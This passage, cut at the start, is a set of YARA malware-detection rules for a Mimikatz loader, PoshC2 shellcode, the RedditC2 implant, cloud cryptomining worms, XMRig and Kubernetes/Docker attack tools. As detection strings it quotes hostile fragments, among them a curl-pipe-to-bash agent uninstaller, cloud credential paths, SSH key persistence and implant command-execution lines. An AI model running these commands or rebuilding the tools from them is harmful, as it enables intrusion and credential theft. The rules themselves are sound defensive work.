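        $s20 = " $encSure = Encrypt-String -unencryptedString 'SURE' -Key $key" ascii fullword
    condition:
        // 0x7566 is the little-endian uint16 of "fu" ("function"). Heuristics
        // first; the full-file SHA-256 only when they fail.
        (uint16(0) == 0x7566 and filesize < 10KB and 8 of them)
        or hash.sha256(0, filesize) == "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7"
}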
rule mi_mimikatz_11462 {
    // Base64-wrapped Mimikatz loader script (mi.ps1). $x1 is the variable
    // assignment that starts the encoded blob; $s2-$s20 are further 128-char
    // slices of the same blob, so the rule is pinned to this one encoding and
    // will not generalise to re-encoded copies.
    meta:
        description = "Mimikatz - file mi.ps1"
        author = "The DFIR Report"
        reference = "https://thedfirreport.com"
        date = "2022-05-01"
        hash1 = "d00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b"
    strings:
        $x1 = "$best64code = \"==gCNkydtdnbrpXbttmc01mazp2bkgCWFlkCNkSKoo3ZtNnatpHayBHJuMXb3RHanNne1FXarhGJo4Wa0R3b3Fnerl3a3RiLr5GcnBHcutmcnpGd"
        $s2 = "lFM5cmbFVFMatSYLlTdTN2QCdXZyg2QsJVYGFEZiJERBV3T0ZVaYJGZZx2Kx4GSXxGdll1LSJ2R5F2d5J3N3VjSRtUZzgDUmpFOap1TwI3bKpHVDFlNL9GUQJTdwYUUr"
        $s3 = "JFT0omerhFawNXbDVVcIdXZ1REOyMUVXBHVZpWZvUGN6dUMp9ycysCbtBXY5IUVSFVbiNXVtJUYVRFeD5mVYtEMIt0SiB3blZmTHlUWrUmV4RXdr80bw12QuVTQtx2LV"
        $s4 = "x0dGlHUFpUYhV1YXVjR4N1b3p0cVRTTj10TxRFNxhnVEdHd5lGWPNTNFdjexRkNzl2MPtie0RWcnJXQ3djbIN0didHMzJTM5NmS01GaB50Z2VGSJVFOyZGd5hlN1BDMR"
        $s5 = "R1TVhlRO10QXtiU4s2UrNEeXp1QDFzblRHb2UmZLFTdsJFR2BDcmdVesdnQKVWZ21GOQ5kaTdGTRJ1UXNzMVdDU4NHa0p0V3MDeEVFaExEcpBVQzQlY5g0bRV0N1lkQq"
        $s6 = "RUUERUNw5UdSZ3bpp0cVVmeRpVVMx2R1ETZIZzYGhEd6J3VidHT3IUMUhHasR3cwAnM2sST5pUZiNVcjFlcSR3cTJkcmdzKZhkTzNGWzJmZ5N1a6lGbZFXSvEzMFBzRa"
        $s7 = "lnMkxERH9EMiRmW4k2doBDS6dXdLlDM4VmRrlTWwMmSmFnNCV1YLdjN0sCUp9WST9SYHlkYaRWb5R3L0oVNn50am9EU6hkV0InYCNmWv4WTktUSxdnW0gET25GNxsWO4"
        $s8 = "NzTyIXSJdFMip1ZrNVY1VzQStCVatEdm92ZU1Wc09SYNt0LRBnYPlEchV1RJN3ZLBlVtRlM2FDNWR0RSZ3d30mUNpHWD52SQFTNQtiS2kEalx0dll3UzQ2NGVEVIl0YT"
        $s9 = "hzQ0QVYxhXWNdDN2lzd0JUR582TUhzaCJmVQhHaLp0c5VkWpNnQhh2QhJDO3oVSwczUkR0MyMkcwAldwJDbOd0SNJEVil0QVF3NGFkez5UYMZUQzgUM3gFOGhGRzU2Vw"
        $s10 = "5mMnVDcohGWUVmbjlDWHFmVv8SY3ZGTrdja3k2TOd3KMBlUstmWrNzYyQzKwIzKzknQYlzKrknYlJndTFleDdnWV5Uc04kNYRldll3LaJjckBTMVp0cPZlZ1Y0MpZkS1"
        $s11 = "F0KtlDetp0c4BnaBVXWERnczUWRPN2KDVTMkh1dFdFaKNmYKRGMrMHan5UbrRGMzIXcvlFe1J0Z0dUMPRFSvlndo9mSkpWQTV1SyNFZLFHRnVWRP5EcjJGcBp3L1c3am"
        $s12 = "QWb5Z0UhJFUwgETQdGMxATdUdXcXRHcTVTMrQEe6JEWBxUTVhGR1hGULp1Vx8UQLRncYBnaN9mVDBFazcnbRFTSJpXTuZDS4dTd0l0ZGJTUYlUSwIEcIFDcnF0Zip0cJ"
        $s13 = "RVUm9GcjV0MwQGV3NGWxMWVSRDMNJHevdUMpFHVxMXQyp3VrcHVJdGeJtUQvMXb3dUZ4cERUdHN3FFSQ5kdL9kap5ENmJ3TDVESHN0SCZlQXJDc2BDOIlmNxxUY0RkN2"
        $s14 = "FzUZxWejZWMmV2ZpdjTxg3arMnQCB1LvoXY4kVdkFEeM1GcwB3TDllMFZGeTF3Z4MzRSR2KTBFaz8EWzBlQlJ0ckNHTpd2KwkURpBXQWF1ZjRTRqlVNvImYmF0bmtUYV"
        $s15 = "NnW3oHNkZ3NY9mMTtmbNJTQx8WdNl3NCtCZGpVOMdUT2BzUWFTW5UjZu9CRIdHcLJzNoZTThhkVwgDOGdXM2B1dLlzUI9SQrllTqVkbst0TywmUwcXTPJmRvFFTPhEeh"
        $s16 = "JUbL5WZxMXQux2bMNFNHhkVh1mY59UQP50Kp52N2FHa1ZHexcXN1oHRMhkes9icpZXU0VTc050VGZDOidUMPZDW0NkNwNjWxVHNrUUVvJmQ4p1LY10ZyFHTBBXcIZ2aZ"
        $s17 = "FmN44kQz9yMRZTQKp1UmVFaOdnSSR3THdkSHJDdO5WRT90SSpHZjZVT3NUZwFkWWhlNpJzN04UZpRzLERnTtVGM4JTbyFGeTRXUwgHeyEmWTVlUr8kU4tyL2JnNTZENv"
        $s18 = "d0aZ1WOFp1YTRWZ4tUVrN0Q5AVQEV3a3UnV2U0QkR3L3hEU3o3LJFWQnZzdzEUO4hFbBJDTUJGeopkclNjMFJDZ6lHa4o1LUVGShp0cup3L5dWZxpmS11mcix2VV5ERv"
        $s19 = "9CNqJmSVRUZjFDR3B1VGhUNZNkQxNmS18WRwpHc2lUYBN1RYNXcntEZWNFeyEzMiRWQr8WOLRVZyg0QiF0QI1Gbr0mZvkmdyxUb4p3Kph2dadGb5EjSRFFdq9WSutydi"
        $s20 = "dUb2JDZLdVVvpFe2YVS1lzSvl1MnlGdv92KKZWdWZGahxUaipGWypUeEZ3dyZWONJFTUdjTx5GR4p0KwYXaSZ2dLl2cRxGS4ZWdZFTNvoEeQpWRKJWQahkaTZWcz9iNa"
    condition:
        // 0x6224 is the little-endian uint16 of "$b": the file starts with the
        // "$best64code" assignment. Requires the anchor plus four slices in total.
        (uint16(0) == 0x6224 and filesize < 10000KB)
        and (1 of ($x*) and 4 of them)
}
import "hash"
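rule PoshC2_Shellcode {
    // PoshC2 base64 shellcode / DLL blobs (Sharp_v2/v4, x86/x64). Known samples
    // are matched by hash; everything else relies on runs of "A" (base64 of zero
    // padding) plus a size cap.
    // NOTE(review): the "all of them" branch has no filesize cap, and $s2/$s3
    // appear to be identical truncated runs, so one occurrence would count twice
    // toward "8 of them"; both points are worth confirming against the upstream rule.
    meta:
        description = "PoshC2 - Sharp_v2_x64_dll.b64, Sharp_v2_x64_Shellcode.b64, Sharp_v2_x86_dll.b64, Sharp_v2_x86_Shellcode.b64, Sharp_v4_x64_dll.b64, Sharp_v4_x64_Shellcode.b64, Sharp_v4_x86_dll.b64, Sharp_v4_x86_Shellcode.b64"
        sha256_1 = "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e"
        sha256_2 = "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2"
        sha256_3 = "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3"
        sha256_4 = "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9"
        sha256_5 = "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989"
        sha256_6 = "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6"
        sha256_7 = "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019"
        sha256_8 = "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9"
    strings:
        // $s1 is base64 of a run of "A" (double-encoded padding); the rest are raw runs.
        $s1 = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"
        $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s4 = "ACAAAAAAAAA"
        $s5 = "ABAAAAAAAAA"
        $s6 = "AAAADAAAAA"
        $s7 = "EAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s8 = "AAAABAAAAA"
        $s9 = "AbAAAAAAAc"
        $s10 = "AAAACAAAAA"
        $s11 = "AAAAAAAAAAAAAAAAAAA"
    condition:
        // Heuristic branches first. 0x5654 is the little-endian uint16 of "TV"
        // (base64 of an "MZ" header begins "TVqQ"); 0x4136 is "6A". The eight
        // full-file SHA-256 comparisons are only reached when both heuristics fail,
        // instead of hashing every scanned file up front.
        (
            (uint16(0) == 0x5654 or uint16(0) == 0x4136)
            and filesize < 600KB
            and 8 of them
        )
        or all of them
        or hash.sha256(0, filesize) == "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e"
        or hash.sha256(0, filesize) == "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2"
        or hash.sha256(0, filesize) == "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3"
        or hash.sha256(0, filesize) == "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9"
        or hash.sha256(0, filesize) == "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989"
        or hash.sha256(0, filesize) == "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6"
        or hash.sha256(0, filesize) == "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019"
        or hash.sha256(0, filesize) == "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9"
}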
import "hash"
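rule RedditC2_ImplantUNIX {
    // RedditC2 implant.py: Python implant tasked through Reddit comments
    // ("in:" prefix), with XOR/base64 obfuscation of tasking. The duplicate
    // user-agent string from the original rule ($s16 == $s13) was removed so
    // it counts once toward "8 of them".
    meta:
        description = "RedditC2 - implant.py"
        sha256 = "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32"
    strings:
        $s1 = " listener_session = subprocess.getoutput('hostname')" ascii fullword
        $s2 = " if(\"in:\" in top_level_comment.body and top_level_comment.id not in self.processed_comments):" ascii fullword
        $s3 = " i = Implant(client_id, client_secret, username, password, subreddit, listener_session, user_agent, xor_key)" ascii fullword
        $s4 = " output = subprocess.getoutput(command)" ascii fullword
        $s5 = " def __init__(self, client_id, client_secret, username, password, subreddit_name, listener_name, user_agent, xor_key):" ascii fullword
        $s6 = "def runTask(command):" ascii fullword
        $s7 = " ciphertext = \"powershell.exe \" + ciphertext[11:]" ascii fullword
        $s8 = "def decrypt(encoded_text, key):" ascii fullword
        $s9 = " self.processed_comments.append(top_level_comment.id)" ascii fullword
        $s10 = " print(\"[+] Received task to execute: \" + ciphertext)" ascii fullword
        $s11 = " self.processed_comments = []" ascii fullword
        $s12 = " if(command[:8] == \"download\"):" ascii fullword
        // Truncated hard-coded Chrome UA (hence no modifiers); common in many scripts.
        $s13 = " user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/"
        $s14 = "def encrypt(plaintext, key):" ascii fullword
        $s15 = "def xor_encrypt(plaintext, key):" ascii fullword
        $s17 = " new_comment_body = comment_body.replace('in', 'executed')" ascii fullword
        $s18 = " self.subreddit.submit(self.listener_name, selftext=postContent)" ascii fullword
        $s19 = "def base64_decode(encoded_text):" ascii fullword
        $s20 = " output = runTask(command)" ascii fullword
    condition:
        // 0x6d69 is the little-endian uint16 of "im" ("import"). Heuristics
        // first; the full-file SHA-256 only when they fail.
        (uint16(0) == 0x6d69 and filesize < 20KB and 8 of them)
        or hash.sha256(0, filesize) == "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32"
}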
rule cloud_mining_worm {
    // Shell-script cryptomining worms targeting cloud hosts: XMRig staging,
    // cloud-agent removal, SSH key persistence and credential file discovery.
    // A single matching line is enough ("any of them"), so each string must be
    // specific on its own.
    meta:
        description = "Detects Common Cloud Mining Worms"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2020-08-16"
        license = "Apache License 2.0"
        hash1 = "3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f"
        hash2 = "929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b"
        hash3 = "705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0"
    strings:
        // Miner staging and execution.
        $a = "echo $LOCKFILE | base64 -d > $tmpxmrigfile" ascii wide
        $b = "/root/.tmp/xmrig config=/root/.tmp/" ascii wide
        $c = "if [ -s /usr/bin/curl ]; then" ascii wide
        // Credential discovery.
        $d = "echo found: /root/.aws/credentials'" ascii wide
        // Competitor-miner and cloud-agent removal.
        $e = "function KILLMININGSERVICES(){" ascii wide
        // SSH key persistence. NOTE(review): $i appears to contain the same
        // e-mail-protection placeholder as the author field and may not match
        // the real sample text; verify against the upstream rule.
        $g = "touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null" ascii wide
        $h = "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service" ascii wide
        $i = " [email protected] /root/.ssh/id_ed25519.pub" ascii wide
        $j = "echo '0' >/proc/sys/kernel/nmi_watchdog" ascii wide
        $k = "curl http://update.aegis.aliyun.com/download/uninstall.sh | bash" ascii wide
        $l = "rm -f /var/tmp/kinsing" ascii wide
    condition:
        filesize < 500KB
        and any of them
}
rule cryptomining_malware_xmrig_config {
    // XMRig JSON configuration files, recognised by their option keys.
    // Five of the seven quoted keys must be present; case-insensitive.
    meta:
        description = "Detects XMRig Config File"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        hash1 = "1085c9211f2af8ddf1588adfb150c64c2b3a2b1c7acf4bc445546455f36299c0"
    strings:
        $key1 = "\"cpu-affinity\"" ascii wide nocase
        $key2 = "\"autosave\"" ascii wide nocase
        $key3 = "\"log-file\"" ascii wide nocase
        $key4 = "\"max-cpu-usage\"" ascii wide nocase
        $key5 = "\"donate-level\"" ascii wide nocase
        $key6 = "\"huge-pages\"" ascii wide nocase
        $key7 = "\"cpu-priority\"" ascii wide nocase
    condition:
        filesize < 500KB
        and 5 of ($key*)
}
rule cryptomining_malware_xmrig {
    // XMRig miner binaries, recognised by command-line help text and the
    // "cryptonight" algorithm name. No filesize cap is applied, so the rule
    // also runs against large files; five of six strings are required.
    meta:
        description = "Detects XMRig"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        hash1 = "a34ae92c904b60ed7c1dc437493d1b086a828d25c52e5409d2c7b79b880db42f"
    strings:
        $help1 = "password for mining server" ascii wide nocase
        $help2 = "threads count to initialize RandomX dataset" ascii wide nocase
        $help3 = "display this help and exit" ascii wide nocase
        $help4 = "maximum CPU threads count (in percentage) hint for autoconfig" ascii wide nocase
        $help5 = "enable CUDA mining backend" ascii wide nocase
        $algo = "cryptonight" ascii wide nocase
    condition:
        5 of them
}
rule pentest_tool_peirates {
    // Peirates Kubernetes penetration-testing tool: service-account token
    // path, a help-text fragment and the AWS S3 SDK symbols it links.
    // All four strings are required.
    meta:
        description = "Detects Peirates"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        hash1 = "a0418d568cfe788fe3d2d0558d70fb6d0e7769a2314c58ca04b57cc3225fe532"
    strings:
        $k8s = "/var/run/secrets/kubernetes.io/serviceaccount/" ascii wide nocase
        $help = "List of comma-seperated Pods" ascii wide nocase
        $aws1 = "github.com/aws/aws-sdk-go/service/s3" ascii wide nocase
        $aws2 = "S3).ListBucketsRequest" ascii wide nocase
    condition:
        all of them
}
rule pentest_tool_kubeletmein {
    // kubeletmein: obtains kubelet credentials from cloud instance metadata.
    // Keyed on its Go import path and user-facing messages; all required.
    meta:
        description = "Detects kubeletmein"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        hash1 = "112709845dc4ba4edd55747b871542f98ab0307fc8b812fffd5c2a7c3b0801f7"
    strings:
        $path = "github.com/4armed/kubeletmein" ascii wide nocase
        $msg1 = "unable to write kubeconfig file" ascii wide nocase
        $msg2 = "now try: kubectl --kubeconfig" ascii wide nocase
        $msg3 = "EC2Metadata request" ascii wide nocase
    condition:
        all of them
}
rule pentest_tool_dopwn {
    // dopwn: DigitalOcean Kubernetes abuse tool. Keyed on a help-text
    // fragment and two Kubernetes resource names; all three required.
    meta:
        description = "Detects dopwn"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        hash1 = "6fae4c6c34478fb515b8510d14071fc955a13e6bfb93121220342fec866317d1"
    strings:
        $help = "grab the digitalocean secret and take over the DO account too" ascii wide nocase
        $k8s1 = "registry/clusterrolebindings" ascii wide nocase
        $k8s2 = "k8s-ca-cert" ascii wide nocase
    condition:
        all of them
}
rule pentest_tool_deepce {
    // DeepCE Docker enumeration / container-escape script, keyed on its
    // banner text and one command line. All four strings are required.
    meta:
        description = "Detects DeepCE"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        // NOTE(review): hash1 is empty in the original; populate it from the
        // reference sample or drop the field so it is not mistaken for a value.
        hash1 = ""
    strings:
        $banner1 = "should be used for authorized penetration testing" ascii wide nocase
        $banner2 = "Docker Enumeration, Escalation of Privileges and Container Escapes" ascii wide nocase
        // Spelling "kubenetes" is kept as written; it is the text the tool prints.
        $banner3 = "Are we inside kubenetes?" ascii wide nocase
        $cmd = "ip route get 1 | head -1" ascii wide nocase
    condition:
        all of them
}
rule suspicious_cloud_credentials {
    // Files that reference credential stores of all three major clouds at
    // once: typical of credential-harvesting scripts and tooling. All three
    // paths are required; no filesize cap.
    meta:
        description = "Detects file containing a number of cloud credentials"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        hash1 = "b58cf43cb4b000cb63334a8e20ca53e0112037daa178062c876a395092e1d8ca"
    strings:
        $aws = ".aws/credentials" ascii wide nocase
        $gcp = ".config/gcloud/access_tokens.db" ascii wide nocase
        $azure = ".azure/credentials" ascii wide nocase
    condition:
        all of them
}